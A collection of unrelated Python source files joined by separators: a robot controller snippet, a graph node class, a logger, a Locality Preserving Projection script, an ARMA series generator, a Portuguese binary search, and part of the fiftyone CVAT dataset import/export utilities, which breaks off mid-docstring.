cmInitRobotData = initRobotData()
cmInitRobotData.init_and_set_controller_manager(cm)
# Specify control mode ##
# Add position mode
cm.addCtrlMode("pos")
# Add torque mode
cm.addCtrlMode("torque")
cm.add_signals()
cm.ctrl_torque.value = array(currentDes)
cm.ctrl_pos.value = pwmDes
cm.setCtrlMode("all", "pos")
|
from .Node import Node
from Utils.config import *
from Utils.constants import *
class LoopNode(Node):
def __init__(self, depth, node_type, anchor):
super().__init__(depth, node_type, anchor.get_regex())
self.go_back = anchor.is_goback_anchor()
def __str__(self):
return f"Node {self.type} (simple) to {self.label}"
def is_goback_node(self):
return self.go_back
def is_control(self):
return False
def is_multiple_labels(self):
return False
def is_label(self):
return False
def add_child(self, node, match=False):
if self.is_label():
if node.get_type() != NODE_LABEL and not self.is_goback_node(): # We don't want the child
return
elif self.is_control():
if not match:
return
super().add_child(node)
def is_complete(self):
if self.go_back:
return len(self.childs) == 2 #One child is the next node, one because of the loop
else:
return len(self.childs) == 1
def go_back_label(self):
if self.go_back:
return self.label
|
'''
Author: W.R. Jackson, Damp Lab 2020
'''
import datetime
import logging
import sys
import colorama
class SingletonBaseClass(type):
_instances = {}
def __call__(cls, *args, **kwargs):
"""
Possible changes to the value of the `__init__` argument do not affect
the returned instance.
"""
if cls not in cls._instances:
instance = super().__call__(*args, **kwargs)
cls._instances[cls] = instance
return cls._instances[cls]
class BLogger(metaclass=SingletonBaseClass):
'''
Simple Custom Logger to enable colorized text output as well as
discrete control over setting logging levels for debugging.
'''
def __init__(self):
logging.basicConfig(
filename=f'beholder_{datetime.datetime.now().isoformat()}.log',
format='[%(asctime)s] [%(levelname)s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.DEBUG,
)
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
self.log = logging.getLogger(__name__)
self.log.setLevel(logging.INFO)
# This only performs any kind of action on a windows machine,
# otherwise it's a no-op.
colorama.init(autoreset=True)
# def write_out(self, output_fp: str):
# self.log.()
def change_logging_level(self, logging_level: str):
'''
Args:
logging_level:
Returns:
'''
logging_level = logging_level.upper()
if logging_level == "DEBUG":
self.log.setLevel(logging.DEBUG)
if logging_level == "INFO":
self.log.setLevel(logging.INFO)
if logging_level == "WARNING":
self.log.setLevel(logging.WARNING)
if logging_level == "ERROR":
self.log.setLevel(logging.ERROR)
if logging_level == "CRITICAL":
self.log.setLevel(logging.CRITICAL)
else:
print(
f'Unable to recognize passed in logging level {logging_level}'
)
def debug(self, message: str):
'''
Args:
message:
Returns:
'''
self.log.debug(
f'{message}'
)
def info(self, message: str):
'''
Args:
message:
Returns:
'''
self.log.info(
f'{message}'
)
def warning(self, message: str):
'''
Args:
message:
Returns:
'''
self.log.warning(
f'{message}'
)
def error(self, message: str):
'''
Args:
message:
Returns:
'''
self.log.error(
f'{message}'
)
def critical(self, message: str):
'''
Args:
message:
Returns:
'''
# Magenta is the most ominous color.
self.log.critical(
f'{message}'
)
def damp_themed(self, message: str):
'''
Args:
message:
Returns:
'''
self.log.info(
f'{message}'
)
|
'''
Created on 2013/04/25
@author: duongnt
'''
import numpy as np
from scipy.linalg import eig
from scipy import spatial # for kdtree
import matplotlib.pyplot as plt
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.decomposition import PCA
from mpl_toolkits.mplot3d import Axes3D
def loadData(filename):
""" Load data from file.
Returns:
-------------------
Data matrix X of size n x d
n: the number of samples
d: the dimensionality of data sample.
"""
X = []
with open(filename, 'rt') as fin:
for line in fin:
row = map(float, line.strip().split(','))
X.append(row)
X = np.asarray(X, dtype='float64')
return X
def plotData(data, figname):
""" Plot data and save the figure in file.
Args:
--------------
data: n x d matrix (ndarray)
figname: figure file name
"""
d = data.shape[1]
assert d <= 3, "Up to 3D data!"
if d == 2: # 2D
plt.scatter(data[:,0], data[:,1], c='r', marker='x', label='2-dim')
plt.legend(loc='best', prop={'size':20})
plt.axis('equal')
plt.savefig(figname)
elif d == 3: # 3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot(data[:,0], data[:,1], data[:,2], 'rx', label='3-dim')
ax.legend(loc='best', prop={'size':20})
ax.view_init(50,80) # view angle
plt.savefig(figname)
else:
pass
def sqDist(X):
""" Compute the pair-wise distance matrix between row vectors of X (samples).
Args:
------------------
X: n x d matrix of n samples
Returns:
--------------------
sqD of size n x n, where sqD_{i,j} = || xi - xj ||^2
"""
n = X.shape[0] # number of samples
tX = X.T # tX has size d x n
sq = np.sum(tX**2, axis=0)
A = np.tile(sq, (n,1))
B = A.T
C = np.dot(X, tX)
sqD = A + B - 2*C
return sqD
def sqDist2(X):
""" Compute the pair-wise distance matrix between row vectors of X,
using sklearn.metrics.pairwise.euclidean_distances.
Args:
-----------
X: n x d
Returns:
------------
sqD of size n x n, where sqD_{i,j} = || xi - xj ||^2
"""
return euclidean_distances(X, X, squared=True)
def dist_based_sim(X, gamma=0.5):
""" Construct distance-based similarity matrix W.
W_ij = exp(-|| xi - xj ||^2 / (gamma^2)).
By using square distance matrix sqD above, we can compute W easily.
Args:
--------------------------------
X: n x d matrix of n samples
gamma: tuning parameter > 0
Returns:
----------------------------------------
Similarity matrix W of size n x n
"""
sqD = sqDist2(X)
W = np.exp(-sqD/(gamma**2))
return W
def local_scaling_based_sim(X, kv=7):
""" Compute distance-based similarity matrix,
using local scaling heuristic.
See L. Zelnik-Manor & P. Perona, Self-tuning spectral clustering,
Advances in NIPS 17, 1601-1608, MIT Press, 2005 for heuristically choosing k value.
"""
tree = spatial.KDTree(X) # use KDTree for knn fast queries.
n = X.shape[0]
gammas = []
for i in range(n):
gammas.append(tree.query(X[i], k=kv)[0][-1]) # compute the distance btw X[i] and its k-th nearest neighbor
gammas = np.asarray(gammas, dtype='float64')
localMat = np.dot(gammas.reshape(n,1), gammas.reshape(1,n)) # localMat[i,j] = gamma_i x gamma_j
sqD = sqDist2(X)
W = np.exp(-sqD/localMat)
return W
def knn_based_sim(X, kv=7):
""" Compute k-nearest-neighbor-based similarity matrix W
Args:
---------
X: n x d matrix of n samples
kv: k value in knn.
Returns:
W: n x n matrix, where
W_{i,j} = 1 if x_i is knn of x_j or x_j is knn of x_i
W_{i,j} = 0, otherwise.
"""
tree = spatial.KDTree(X)
n = X.shape[0]
knn_idx = []
for i in range(n):
knn_idx.append(tree.query(X[i], k=kv)[1])
W = np.zeros((n,n), dtype='int')
for i in range(n):
for j in range(i,n):
if (i in knn_idx[j]) or (j in knn_idx[i]):
W[i,j] = W[j,i] = 1
return W
def lpp(X, W):
""" Locality Preserving Projection (LPP).
Args:
X: data matrix of size n x d (n samples, dimensionality d)
W: similarity(affinity) matrix of size n x n (pair-wise similarities matrix)
Returns:
B = [y1|y2|...|ym] of size d x m, where:
y1(e1), y2(e2),...ym(em) are solutions (eigenvector,eigenvalue)
of a generalized eigenvalue problem: X L tX y = e X D tX y
and e1 <= e2 <= .... <= em (the m smallest eigenvalues).
"""
D = np.diag(np.sum(W, axis=1))
L = D - W # construct graph-Laplacian matrix
def matprod(*args):
return reduce(np.dot, args)
A = matprod(X.T, L, X)
B = matprod(X.T, D, X)
#d = B.shape[0]
#Id = np.eye(d)
evals, V = eig(A, B) # w are sorted in INCREASING order. y_i = V[:,i] = i-th column of V
# Need to sort in an increasing order
sorted_indices = np.argsort(evals)
V = V[:,sorted_indices]
return evals, V
def lpp_transform(X, V, ncomp=2):
"""
Args:
--------------
X: n x d. Data matrix
V: d x m. Each column of V is a LPP direction.
ncomp (<= m <= d): The dimension of transformed data
Returns:
--------------
tr_X: n x ncomp
"""
_, m = V.shape
if ncomp > m:
ncomp = m
tr_X = np.dot(X, V[:,0:ncomp])
return tr_X
def main(X, figname, sim_type='dist_based'):
""" Main program: Locality Preserving Projection Algorithm
Args:
-----------
X: n x d matrix of n samples.
figname: filename to save a plot figure.
sim_type: similarity matrix type,
'dist_based' for distance based similarity
'local_scaling' for local scaling based similarity
'knn' for knn based similarity.
"""
if sim_type == 'dist_based':
W = dist_based_sim(X, gamma=0.5)
elif sim_type == 'local_scaling':
W = local_scaling_based_sim(X, kv=7)
elif sim_type == 'knn':
W = knn_based_sim(X, kv=50)
else:
raise ValueError, "Invalid similarity type!"
_, V = lpp(X, W)
xmean = np.mean(X, axis=0)
pca = PCA(n_components=2, whiten=True).fit(X)
pmean = pca.mean_
pcs = pca.components_
def plot_pca_dir(pc):
plt.plot([k*pc[0]+pmean[0] for k in np.linspace(-0.5,0.5)],
[k*pc[1]+pmean[1] for k in np.linspace(-0.5,0.5)],
'm-', lw=4, label='PCA')
def plot_lpp_dir(direction):
""" Plot LPP direction. """
plt.plot([xmean[0]+k*direction[0] for k in np.linspace(-0.8,0.8)],
[xmean[1]+k*direction[1] for k in np.linspace(-0.8,0.8)],
'g-', lw=4, label='LPP')
first_dir = V[:,0]
fig = plt.figure()
fig.clf()
#plt.scatter(X[:,0], X[:,1], c='r', marker='x', label='original data')
plt.scatter(X[:,0], X[:,1], c='r', marker='x')
plot_pca_dir(pcs[0])
plot_lpp_dir(first_dir)
plt.legend(loc='best', prop={'size':20})
plt.axis('equal')
plt.savefig(figname)
def lpp_for_4d_data(filename='4d-x.txt'):
X = []
with open(filename, 'r') as fin:
for line in fin:
X.append(map(float, line.strip().split(',')))
X = np.asarray(X, dtype='float64')
#W = knn_based_sim(X, kv=2)
#W = dist_based_sim(X, gamma=0.5)
W = local_scaling_based_sim(X, kv=7)
_, V = lpp(X, W)
trX = lpp_transform(X, V, ncomp=2)
plotData(trX, figname='local7-lpp-4dto2d.eps')
def lpp4Iris():
from sklearn.datasets import load_iris
iris = load_iris()
X = iris.data
Y = iris.target
cs = ['b', 'g', 'r']
ms = ['+', 'o', 'x']
lb = ['setosa', 'versicolor', 'virginica']
k = 5
ncomp = 2
#W = local_scaling_based_sim(X, kv=k)
W = knn_based_sim(X, kv=k)
_, V = lpp(X, W)
trX = lpp_transform(X, V, ncomp=ncomp)
fig = plt.figure()
fig.clf()
if ncomp == 3:
ax = fig.add_subplot(111, projection='3d')
for i in range(3):
ax.plot(trX[Y==i,0], trX[Y==i,1], trX[Y==1,2], cs[i]+ms[i], label=lb[i])
ax.view_init(50, 70)
plt.legend(loc='best', prop={'size':20})
#plt.savefig('3d/local-%dnn-iris-3d.eps' % k)
plt.savefig('3d/%dnn-iris-3d.png' % k)
elif ncomp == 2:
for i in range(3):
plt.plot(trX[Y==i,0], trX[Y==i,1], cs[i]+ms[i], label=lb[i])
plt.legend(loc='best', prop={'size':20})
#plt.savefig('2d/local-%dnn-iris-2d.eps' % k)
plt.savefig('2d/%dnn-iris-2d.png' % k)
else:
pass
def lpp4Digits():
from sklearn.datasets import load_digits
digit = load_digits(3)
X = digit.data
Y = digit.target
lb = ['0', '1', '2']
cs = ['b', 'g', 'r']
ms = ['+', 'o', 'x']
ncomp = 2
#W = knn_based_sim(X, kv=7)
W = local_scaling_based_sim(X, kv=20)
_, V = lpp(X, W)
tr_data = lpp_transform(X, V, ncomp=ncomp)
fig = plt.figure()
fig.clf()
if ncomp == 2:
for i in range(3):
plt.plot(tr_data[Y==i,0], tr_data[Y==i,1], cs[i]+ms[i], label=lb[i])
plt.legend(loc='best', prop={'size':20})
plt.savefig('lpp-digit-2d.png')
elif ncomp == 3:
ax = fig.add_subplot(111, projection='3d')
for i in range(3):
ax.plot(tr_data[Y==i,0], tr_data[Y==i,1], tr_data[Y==i,2], cs[i]+ms[i], label=lb[i])
ax.legend(loc='best', prop={'size':20})
ax.view_init(50, 70)
plt.savefig('lpp-digit-3d.png')
if __name__ == '__main__':
#X = loadData('2d-2.txt')
#plotData(X, 'original-2d-1.png')
#main(X, 'knn_based_lpp_2d_1.eps', sim_type='knn')
#main(X, '2d_2.eps', sim_type='knn')
#lpp_for_4d_data()
lpp4Iris()
|
import numpy as np
class ARMA:
"""Class that generates WN, AR, MA and ARMA processes."""
@staticmethod
def generate_wn(n, sigma=1):
"""Generates a white noise series.
The code follows:
y_{t} = \epsilon_{t}
Args:
n: length of the series.
sigma: standard deviation of the innovations.
Returns:
np.Array with the series.
"""
return np.random.normal(0, sigma, size=n)
@staticmethod
def generate_ma(n, thetas, mu, sigma=1):
"""Generates a moving average series.
The code follows:
y_{t} = \mu + \epsilon_{t} + \theta_{1}\epsilon_{t-1} + \theta_{2}\epsilon_{t-2} + ... + \theta_{q}\epsilon_{t-q}
Args:
n: length of the series.
thetas: list of thetas, in the order \theta_{1}, \theta_{2}, ..., \theta_{q}.
mu: base constant.
sigma: standard deviation of the innovations (optional).
Returns:
np.Array with the series.
"""
q = len(thetas)
adj_n = n + q # We add q values because at the beginning we have no thetas available.
e_series = ARMA.generate_wn(adj_n, sigma) # Generating a white noise.
ma = []
for i in range(1, adj_n):
visible_thetas = thetas[0:min(q, i)] # At first, we only "see" some of the thetas.
visible_e_series = e_series[i - min(q, i):i] # The same happens to the white noise.
reversed_thetas = visible_thetas[::-1]
try: # Getting e_t if we can.
e_t = visible_e_series[-1]
except IndexError:
e_t = 0
# Main equation.
ma_t = mu + e_t + np.dot(reversed_thetas, visible_e_series)
ma.append(ma_t)
ma = ma[max(q-1, 0):] # Dropping the first values that did not use all the thetas.
return ma
@staticmethod
def generate_ar(n, phis, sigma=1):
"""Generates an autoregressive series.
The code follows:
y_{t} = \phi_{1} y_{t-1} + \phi_{2} y_{t-2} + ... + \phi_{p} y_{t-p} + \epsilon_{t}
Args:
n: length of the series.
phis: list of thetas, in the order \phi_{1}, \phi_{2}, ..., \phi_{p}.
sigma: standard deviation of the innovations (optional).
Returns:
np.Array with the series.
"""
p = len(phis)
adj_n = n + p # We add q values because at the beginning we have no phis available.
e_series = ARMA.generate_wn(adj_n, sigma) # Generating a white noise.
ar = [e_series[0]] # We start the series with a random value
for i in range(1, adj_n):
visible_phis = phis[0:min(p, i)] # At first, we only "see" some of the phis.
visible_series = ar[i - min(p, i):i] # The same happens to the white noise.
reversed_phis = visible_phis[::-1]
# Main equation.
ar_t = e_series[i] + np.dot(reversed_phis, visible_series)
ar.append(ar_t)
ar = ar[p:] # Dropping the first values that did not use all the phis.
return ar
@staticmethod
def generate_arma(n, phis, thetas, mu, sigma=1):
"""Generates an autoregressive moving average series.
The code follows:
y_{t} = \mu + \phi_{1} y_{t-1} + \phi_{2} y_{t-2} + ... + \phi_{p} y_{t-p} + \epsilon_{t} + \theta_{1}\epsilon_{t-1} + \theta_{2}\epsilon_{t-2} + ... + \theta_{q}\epsilon_{t-q}
Args:
n: length of the series.
phis: list of thetas, in the order \phi_{1}, \phi_{2}, ..., \phi_{p}.
thetas: list of thetas, in the order \theta_{1}, \theta_{2}, ..., \theta_{q}.
mu: base constant.
sigma: standard deviation of the innovations (optional).
Returns:
np.Array with the series.
"""
p = len(phis)
q = len(thetas)
adj_n = n + max(p, q) # We use max to make sure we cover the lack of coefficients.
e_series = ARMA.generate_wn(adj_n) # Base white noise.
arma = [e_series[0]] # We start the series with a random value (same as AR).
for i in range(1, adj_n):
visible_phis = phis[0:min(p, i)]
visible_thetas = thetas[0:min(q, i)]
reversed_phis = visible_phis[::-1]
reversed_thetas = visible_thetas[::-1]
visible_series = arma[i - min(p, i):i]
visible_e_series = e_series[i - min(q, i):i]
try: # Getting e_t if we can.
e_t = visible_e_series[-1]
except IndexError:
e_t = 0
# Main equation.
ar_t = + np.dot(reversed_phis, visible_series)
ma_t = mu + e_t + np.dot(reversed_thetas, visible_e_series)
arma_t = ar_t + ma_t
arma.append(arma_t)
arma = arma[max(p, q):] # Dropping the first values that did not use all the phis or thetas.
return arma
|
""" Implementação do algoritmo de busca binária com recursão """
def busca_binaria(valor, vetor, esquerda, direita):
"""
Implementação de um algoritmo de busca binária com recursão.
Argumentos:
valor: Any. Valor a ser buscado na lista
vetor: list. lista ordenada na qual o valor será buscado
esquerda: Any. Valor inicial da metade buscada
direita: Any. Valor final da metade buscada
Retorna o índice do valor em "vetor" ou -1 caso não exista nela.
"""
meio = int((esquerda + direita) / 2)
if esquerda <= direita:
if valor > vetor[meio]:
esquerda = meio + 1
return busca_binaria(valor, vetor, esquerda, direita)
elif valor < vetor[meio]:
direita = meio - 1
return busca_binaria(valor, vetor, esquerda, direita)
return meio
return -1
lista = [0, 1, 3, 5, 6, 7, 8, 9, 10, 11, 12]
print(busca_binaria(12, lista, 0, len(lista)))
|
"""
Utilities for working with datasets in
`CVAT format <https://github.com/opencv/cvat>`_.
| Copyright 2017-2020, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
from collections import defaultdict
from datetime import datetime
import logging
import os
import jinja2
import eta.core.data as etad
import eta.core.image as etai
import eta.core.utils as etau
import fiftyone as fo
import fiftyone.constants as foc
import fiftyone.core.frame as fof
import fiftyone.core.labels as fol
import fiftyone.core.metadata as fom
import fiftyone.core.utils as fou
import fiftyone.utils.data as foud
logger = logging.getLogger(__name__)
class CVATImageSampleParser(foud.LabeledImageTupleSampleParser):
"""Parser for samples in
`CVAT image format <https://github.com/opencv/cvat>`_.
This implementation supports samples that are
``(image_or_path, image_tag_dict)`` tuples, where:
- ``image_or_path`` is either an image that can be converted to numpy
format via ``np.asarray()`` or the path to an image on disk
- ``image_tag_dict`` is a JSON dictionary representation of an
``<image>`` tag of a CVAT image annotations file, which should have
the following format::
{
"@id": "0",
"@name": "filename.jpg",
"@width": "640",
"@height": "480",
"box": [
{
"@label": "car",
"@xtl": "100",
"@ytl": "50",
"@xbr": "325",
"@ybr": "190",
"@occluded": "0",
"attribute": [
{
"@name": "type",
"#text": "sedan"
},
...
]
},
...
],
...
}
For unlabeled images, ``image_tag_dict`` can be ``None``.
See :class:`fiftyone.types.dataset_types.CVATImageDataset` for more format
details.
"""
def __init__(self):
super().__init__()
self._cvat_image_cache = None
@property
def label_cls(self):
return fol.Detections
@property
def has_image_metadata(self):
return True
def get_image_metadata(self):
cvat_image = self._cvat_image
if cvat_image is None:
return None
return cvat_image.get_image_metadata()
def get_label(self):
"""Returns the label for the current sample.
Args:
sample: the sample
Returns:
a :class:`fiftyone.core.labels.Detections` instance, or ``None`` if
the sample is unlabeled
"""
cvat_image = self._cvat_image
if cvat_image is None:
return None
return cvat_image.to_detections()
def clear_sample(self):
super().clear_sample()
self._cvat_image_cache = None
@property
def _cvat_image(self):
if self._cvat_image_cache is None:
self._cvat_image_cache = self._parse_cvat_image()
return self._cvat_image_cache
def _parse_cvat_image(self):
d = self.current_sample[1]
return CVATImage.from_image_dict(d) if d is not None else None
class CVATVideoSampleParser(foud.LabeledVideoSampleParser):
"""Parser for samples in
`CVAT video format <https://github.com/opencv/cvat>`_.
This implementation supports samples that are
``(video_path, image_tag_dict)`` tuples, where:
- ``video_path`` is the path to a video on disk
- ``anno_path`` is the path to a CVAT video labels XML file on disk,
or ``None`` for unlabeled videos.
See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for more format
details.
"""
def __init__(self):
super().__init__()
self._objects_field = "objects"
@property
def has_video_metadata(self):
return False
def get_video_path(self):
return self.current_sample[0]
def get_frame_labels(self):
labels_path = self.current_sample[1]
if not labels_path:
return None
_, _, cvat_tracks = load_cvat_video_annotations(labels_path)
return _cvat_tracks_to_frames(cvat_tracks, self._objects_field)
class CVATImageDatasetImporter(foud.LabeledImageDatasetImporter):
"""Importer for CVAT image datasets stored on disk.
See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format
details.
Args:
dataset_dir: the dataset directory
skip_unlabeled (False): whether to skip unlabeled images when importing
shuffle (False): whether to randomly shuffle the order in which the
samples are imported
seed (None): a random seed to use when shuffling
max_samples (None): a maximum number of samples to import. By default,
all samples are imported
"""
def __init__(
self,
dataset_dir,
skip_unlabeled=False,
shuffle=False,
seed=None,
max_samples=None,
):
super().__init__(
dataset_dir,
skip_unlabeled=skip_unlabeled,
shuffle=shuffle,
seed=seed,
max_samples=max_samples,
)
self._data_dir = None
self._labels_path = None
self._info = None
self._images_map = None
self._filenames = None
self._iter_filenames = None
self._num_samples = None
def __iter__(self):
self._iter_filenames = iter(self._filenames)
return self
def __len__(self):
return self._num_samples
def __next__(self):
filename = next(self._iter_filenames)
image_path = os.path.join(self._data_dir, filename)
cvat_image = self._images_map.get(filename, None)
if cvat_image is not None:
# Labeled image
image_metadata = cvat_image.get_image_metadata()
detections = cvat_image.to_detections()
else:
# Unlabeled image
image_metadata = fom.ImageMetadata.build_for(image_path)
detections = None
return image_path, image_metadata, detections
@property
def has_dataset_info(self):
return True
@property
def has_image_metadata(self):
return True
@property
def label_cls(self):
return fol.Detections
def setup(self):
self._data_dir = os.path.join(self.dataset_dir, "data")
self._labels_path = os.path.join(self.dataset_dir, "labels.xml")
if os.path.isfile(self._labels_path):
info, _, cvat_images = load_cvat_image_annotations(
self._labels_path
)
else:
info = {}
cvat_images = []
self._info = info
# Index by filename
self._images_map = {i.name: i for i in cvat_images}
filenames = etau.list_files(self._data_dir, abs_paths=False)
if self.skip_unlabeled:
filenames = [f for f in filenames if f in self._images_map]
self._filenames = self._preprocess_list(filenames)
self._num_samples = len(self._filenames)
def get_dataset_info(self):
return self._info
class CVATVideoDatasetImporter(foud.LabeledVideoDatasetImporter):
"""Importer for CVAT video datasets stored on disk.
See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format
details.
Args:
dataset_dir: the dataset directory
skip_unlabeled (False): whether to skip unlabeled videos when importing
shuffle (False): whether to randomly shuffle the order in which the
samples are imported
seed (None): a random seed to use when shuffling
max_samples (None): a maximum number of samples to import. By default,
all samples are imported
"""
def __init__(
self,
dataset_dir,
skip_unlabeled=False,
shuffle=False,
seed=None,
max_samples=None,
):
super().__init__(
dataset_dir,
skip_unlabeled=skip_unlabeled,
shuffle=shuffle,
seed=seed,
max_samples=max_samples,
)
self._objects_field = "objects"
self._info = None
self._cvat_task_labels = None
self._uuids_to_video_paths = None
self._uuids_to_labels_paths = None
self._uuids = None
self._iter_uuids = None
self._num_samples = None
def __iter__(self):
self._iter_uuids = iter(self._uuids)
return self
def __len__(self):
return self._num_samples
def __next__(self):
uuid = next(self._iter_uuids)
video_path = self._uuids_to_video_paths[uuid]
labels_path = self._uuids_to_labels_paths.get(uuid, None)
if labels_path:
# Labeled video
info, cvat_task_labels, cvat_tracks = load_cvat_video_annotations(
labels_path
)
if self._info is None:
self._info = info
self._cvat_task_labels.merge_task_labels(cvat_task_labels)
self._info["task_labels"] = self._cvat_task_labels.labels
frames = _cvat_tracks_to_frames(cvat_tracks, self._objects_field)
else:
# Unlabeled video
frames = None
return video_path, None, frames
@property
def has_dataset_info(self):
return True
@property
def has_video_metadata(self):
return False # has (width, height) but not other important info
def setup(self):
to_uuid = lambda p: os.path.splitext(os.path.basename(p))[0]
data_dir = os.path.join(self.dataset_dir, "data")
if os.path.isdir(data_dir):
self._uuids_to_video_paths = {
to_uuid(p): p
for p in etau.list_files(data_dir, abs_paths=True)
}
else:
self._uuids_to_video_paths = {}
labels_dir = os.path.join(self.dataset_dir, "labels")
if os.path.isdir(labels_dir):
self._uuids_to_labels_paths = {
to_uuid(p): p
for p in etau.list_files(labels_dir, abs_paths=True)
}
else:
self._uuids_to_labels_paths = {}
if self.skip_unlabeled:
uuids = sorted(self._uuids_to_labels_paths.keys())
else:
uuids = sorted(self._uuids_to_video_paths.keys())
self._info = None
self._uuids = self._preprocess_list(uuids)
self._num_samples = len(self._uuids)
self._cvat_task_labels = CVATTaskLabels()
def get_dataset_info(self):
return self._info
class CVATImageDatasetExporter(foud.LabeledImageDatasetExporter):
"""Exporter that writes CVAT image datasets to disk.
See :class:`fiftyone.types.dataset_types.CVATImageDataset` for format
details.
Args:
export_dir: the directory to write the export
image_format (None): the image format to use when writing in-memory
images to disk. By default, ``fiftyone.config.default_image_ext``
is used
"""
def __init__(self, export_dir, image_format=None):
if image_format is None:
image_format = fo.config.default_image_ext
super().__init__(export_dir)
self.image_format = image_format
self._name = None
self._task_labels = None
self._data_dir = None
self._labels_path = None
self._cvat_images = None
self._filename_maker = None
@property
def requires_image_metadata(self):
return True
@property
def label_cls(self):
return fol.Detections
def setup(self):
self._data_dir = os.path.join(self.export_dir, "data")
self._labels_path = os.path.join(self.export_dir, "labels.xml")
self._cvat_images = []
self._filename_maker = fou.UniqueFilenameMaker(
output_dir=self._data_dir, default_ext=self.image_format
)
def log_collection(self, sample_collection):
self._name = sample_collection.name
self._task_labels = sample_collection.info.get("task_labels", None)
def export_sample(self, image_or_path, detections, metadata=None):
out_image_path = self._export_image_or_path(
image_or_path, self._filename_maker
)
if detections is None:
return
if metadata is None:
metadata = fom.ImageMetadata.build_for(out_image_path)
cvat_image = CVATImage.from_detections(detections, metadata)
cvat_image.id = len(self._cvat_images)
cvat_image.name = os.path.basename(out_image_path)
self._cvat_images.append(cvat_image)
def close(self, *args):
# Get task labels
if self._task_labels is None:
# Compute task labels from active label schema
cvat_task_labels = CVATTaskLabels.from_cvat_images(
self._cvat_images
)
else:
# Use task labels from logged collection info
cvat_task_labels = CVATTaskLabels(labels=self._task_labels)
# Write annotations
writer = CVATImageAnnotationWriter()
writer.write(
cvat_task_labels,
self._cvat_images,
self._labels_path,
id=0,
name=self._name,
)
class CVATVideoDatasetExporter(foud.LabeledVideoDatasetExporter):
"""Exporter that writes CVAT video datasets to disk.
See :class:`fiftyone.types.dataset_types.CVATVideoDataset` for format
details.
Args:
export_dir: the directory to write the export
"""
def __init__(self, export_dir):
super().__init__(export_dir)
self._task_labels = None
self._data_dir = None
self._labels_dir = None
self._filename_maker = None
self._writer = None
self._num_samples = 0
@property
def requires_video_metadata(self):
return True
def setup(self):
self._data_dir = os.path.join(self.export_dir, "data")
self._labels_dir = os.path.join(self.export_dir, "labels")
self._filename_maker = fou.UniqueFilenameMaker(
output_dir=self._data_dir
)
self._writer = CVATVideoAnnotationWriter()
etau.ensure_dir(self._data_dir)
etau.ensure_dir(self._labels_dir)
def log_collection(self, sample_collection):
self._task_labels = sample_collection.info.get("task_labels", None)
def export_sample(self, video_path, frames, metadata=None):
out_video_path = self._export_video(video_path, self._filename_maker)
if frames is None:
return
if metadata is None:
metadata = fom.VideoMetadata.build_for(out_video_path)
name_with_ext = os.path.basename(out_video_path)
name = os.path.splitext(name_with_ext)[0]
out_anno_path = os.path.join(self._labels_dir, name + ".xml")
# Generate object tracks
frame_size = (metadata.frame_width, metadata.frame_height)
cvat_tracks = _frames_to_cvat_tracks(frames, frame_size)
# Get task labels
if self._task_labels is None:
# Compute task labels from active label schema
cvat_task_labels = CVATTaskLabels.from_cvat_tracks(cvat_tracks)
else:
# Use task labels from logged collection info
cvat_task_labels = CVATTaskLabels(labels=self._task_labels)
# Write annotations
self._num_samples += 1
self._writer.write(
cvat_task_labels,
cvat_tracks,
metadata,
out_anno_path,
id=self._num_samples - 1,
name=name_with_ext,
)
class CVATTaskLabels(object):
"""Description of the labels in a CVAT image annotation task.
Args:
labels (None): a list of label dicts in the following format::
[
{
"name": "car",
"attributes": [
{
"name": "type"
"categories": ["coupe", "sedan", "truck"]
},
...
}
},
...
]
"""
def __init__(self, labels=None):
self.labels = labels or []
def merge_task_labels(self, task_labels):
"""Merges the given :class:`CVATTaskLabels` into this instance.
Args:
task_labels: a :class:`CVATTaskLabels`
"""
schema = self.to_schema()
schema.merge_schema(task_labels.to_schema())
new_task_labels = CVATTaskLabels.from_schema(schema)
self.labels = new_task_labels.labels
def to_schema(self):
"""Returns an ``eta.core.image.ImageLabelsSchema`` representation of
the task labels.
Returns:
an ``eta.core.image.ImageLabelsSchema``
"""
schema = etai.ImageLabelsSchema()
for label in self.labels:
_label = label["name"]
schema.add_object_label(_label)
for attribute in label.get("attributes", []):
_name = attribute["name"]
_categories = attribute["categories"]
for _value in _categories:
_attr = etad.CategoricalAttribute(_name, _value)
schema.add_object_attribute(_label, _attr)
return schema
@classmethod
def from_cvat_images(cls, cvat_images):
"""Creates a :class:`CVATTaskLabels` instance that describes the active
schema of the given annotations.
Args:
cvat_images: a list of :class:`CVATImage` instances
Returns:
a :class:`CVATTaskLabels`
"""
schema = etai.ImageLabelsSchema()
for cvat_image in cvat_images:
for box in cvat_image.boxes:
_label = box.label
schema.add_object_label(_label)
if box.occluded is not None:
schema.add_object_attribute("occluded", box.occluded)
for attr in box.attributes:
_attr = attr.to_eta_attribute()
schema.add_object_attribute(_label, _attr)
return cls.from_schema(schema)
@classmethod
def from_cvat_tracks(cls, cvat_tracks):
"""Creates a :class:`CVATTaskLabels` instance that describes the active
schema of the given annotations.
Args:
cvat_tracks: a list of :class:`CVATTrack` instances
Returns:
a :class:`CVATTaskLabels`
"""
schema = etai.ImageLabelsSchema()
for cvat_track in cvat_tracks:
for box in cvat_track.boxes.values():
_label = box.label
schema.add_object_label(_label)
if box.outside is not None:
schema.add_object_attribute("outside", box.outside)
if box.occluded is not None:
schema.add_object_attribute("occluded", box.occluded)
if box.keyframe is not None:
schema.add_object_attribute("keyframe", box.keyframe)
for attr in box.attributes:
_attr = attr.to_eta_attribute()
schema.add_object_attribute(_label, _attr)
return cls.from_schema(schema)
@classmethod
def from_labels_dict(cls, d):
"""Creates a :class:`CVATTaskLabels` instance from the ``<labels>``
tag of a CVAT image annotation XML file.
Args:
d: a dict representation of a ``<labels>`` tag
Returns:
a :class:`CVATTaskLabels`
"""
labels = _ensure_list(d.get("label", []))
_labels = []
for label in labels:
_tmp = label.get("attributes", None) or {}
attributes = _ensure_list(_tmp.get("attribute", []))
_attributes = []
for attribute in attributes:
_attributes.append(
{
"name": attribute["name"],
"categories": attribute["values"].split("\n"),
}
)
_labels.append({"name": label["name"], "attributes": _attributes})
return cls(labels=_labels)
@classmethod
def from_schema(cls, schema):
"""Creates a :class:`CVATTaskLabels` instance from an
``eta.core.image.ImageLabelsSchema``.
Args:
schema: an ``eta.core.image.ImageLabelsSchema``
